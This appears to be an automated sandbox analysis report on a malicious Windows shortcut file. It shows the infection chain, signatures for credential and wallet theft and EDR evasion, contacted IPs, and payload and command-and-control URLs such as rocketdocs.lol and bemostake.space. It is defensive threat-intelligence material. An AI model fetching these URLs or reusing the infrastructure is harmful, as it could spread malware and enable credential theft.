behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529310 Sample: fBcMVl6ns6.lnk Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 66 rocketdocs.lol 2->66 68 bemostake.space 2->68 70 1h982d.bemostake.space 2->70 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Windows shortcut file (LNK) starts blacklisted processes 2->92 94 17 other signatures 2->94 10 cmd.exe 1 2->10         started        13 regsvr32.exe 1 2 2->13         started        15 regsvr32.exe 2->15         started        signatures3 process4 dnsIp5 112 Windows shortcut file (LNK) starts blacklisted processes 10->112 114 Obfuscated command line found 10->114 18 powershell.exe 14 18 10->18         started        23 conhost.exe 1 10->23         started        116 Sets debug register (to hijack the execution of another thread) 13->116 25 OpenWith.exe 13->25         started        78 185.196.9.174 SIMPLECARRIERCH Switzerland 15->78 80 8.8.8.8 GOOGLEUS United States 15->80 118 System process connects to network (likely due to code injection or exploit) 15->118 signatures6 process7 dnsIp8 72 1h982d.bemostake.space 188.114.96.3, 443, 49705, 49706 CLOUDFLARENETUS European Union 18->72 74 rocketdocs.lol 188.114.97.3, 443, 49707 CLOUDFLARENETUS European Union 18->74 56 C:\Users\user\Desktop\utox_x86_x64.exe, PE32+ 18->56 dropped 58 C:\Users\Public\ajbs50ul.bat, PE32+ 18->58 dropped 96 Drops PE files to the user root directory 18->96 98 Powershell creates an autostart link 18->98 100 Powershell drops PE file 18->100 27 ajbs50ul.bat 1 18->27         started        31 utox_x86_x64.exe 1 36 18->31         started        76 147.45.126.71, 3752, 49716, 49717 FREE-NET-ASFREEnetEU Russian Federation 25->76 102 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->102 104 Tries to steal Mail credentials (via file / registry access) 25->104 106 Found many strings related to Crypto-Wallets (likely being stolen) 25->106 108 2 other signatures 25->108 34 rekeywiz.exe 25->34         started        36 wmprph.exe 25->36         started        38 rekeywiz.exe 25->38         started        file9 signatures10 process11 dnsIp12 60 C:\Users\user\AppData\Roaming\M08e.ini, PE32+ 27->60 dropped 120 Windows shortcut file (LNK) starts blacklisted processes 27->120 122 Multi AV Scanner detection for dropped file 27->122 124 Suspicious powershell command line found 27->124 126 Found direct / indirect Syscall (likely to bypass EDR) 27->126 40 powershell.exe 37 27->40         started        43 regsvr32.exe 27->43         started        82 104.223.122.15 ASN-QUADRANET-GLOBALUS United States 31->82 84 192.168.2.8, 33445, 3752, 443 unknown unknown 31->84 86 24 other IPs or domains 31->86 62 C:\Users\user\AppData\Roamingbehaviorgraphga6.ini, PE32+ 34->62 dropped 45 powershell.exe 34->45         started        47 regsvr32.exe 34->47         started        128 Writes to foreign memory regions 36->128 130 Allocates memory in foreign processes 36->130 49 dllhost.exe 36->49         started        file13 signatures14 process15 dnsIp16 110 Loading BitLocker PowerShell Module 40->110 52 conhost.exe 40->52         started        54 conhost.exe 45->54         started        64 46.29.238.96 EUROTELECOM-ASRU Russian Federation 49->64 signatures17 process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.93.190.6
 unknown Ukraine
15713 GCN-UA false
148.251.23.146
 unknown Germany
24940 HETZNER-ASDE false
104.233.104.126
 unknown Saudi Arabia
13886 CLOUD-SOUTHUS false
163.172.136.118
 unknown United Kingdom
12876 OnlineSASFR false
95.215.44.78
 unknown Latvia
52173 MAKONIXLV false
193.124.186.205
 unknown Russian Federation
35196 IHOR-ASRU false
46.29.238.96
 unknown Russian Federation
34804 EUROTELECOM-ASRU true
8.8.8.8
 unknown United States
15169 GOOGLEUS false
37.97.185.116
 unknown Netherlands
20857 TRANSIP-ASAmsterdamtheNetherlandsNL false
130.133.110.14
 unknown Germany
680 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese false
194.249.212.109
 unknown Slovenia
2107 ARNES-NETAcademicandResearchNetworkofSloveniaSI false
136.243.141.187
 unknown Germany
24940 HETZNER-ASDE false
37.187.122.30
 unknown France
16276 OVHFR false
147.45.126.71
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
185.14.30.213
 unknown Ukraine
21100 ITLDC-NLUA false
185.58.206.164
 unknown Russian Federation
35196 IHOR-ASRU false
51.254.84.212
 unknown France
16276 OVHFR false
80.87.193.193
 unknown Russian Federation
29182 THEFIRST-ASRU false
46.229.52.198
 unknown Ukraine
34056 KIEVNETKievNetISPASUA false
104.223.122.15
 unknown United States
8100 ASN-QUADRANET-GLOBALUS true
188.114.97.3
 rocketdocs.lol European Union
13335 CLOUDFLARENETUS false
205.185.116.116
 unknown United States
53667 PONYNETUS false
85.21.144.224
 unknown Russian Federation
8402 CORBINA-ASOJSCVimpelcomRU false
85.130.224.235
 unknown Israel
8551 BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL false
188.114.96.3
 bemostake.space European Union
13335 CLOUDFLARENETUS false
185.196.9.174
 unknown Switzerland
42624 SIMPLECARRIERCH true
198.98.51.198
 unknown United States
53667 PONYNETUS false

Private

IP
192.168.2.8
192.168.2.7
192.168.2.9
192.168.2.5
192.168.2.255

Contacted Domains

Name IP Active
bemostake.space 188.114.96.3 true
1h982d.bemostake.space 188.114.96.3 true
rocketdocs.lol 188.114.97.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm true
    		unknown
    https://rocketdocs.lol/utox_x86.exe false
      		unknown
      https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe false
        		unknown
        https://1h982d.bemostake.space/test.txt false
          		unknown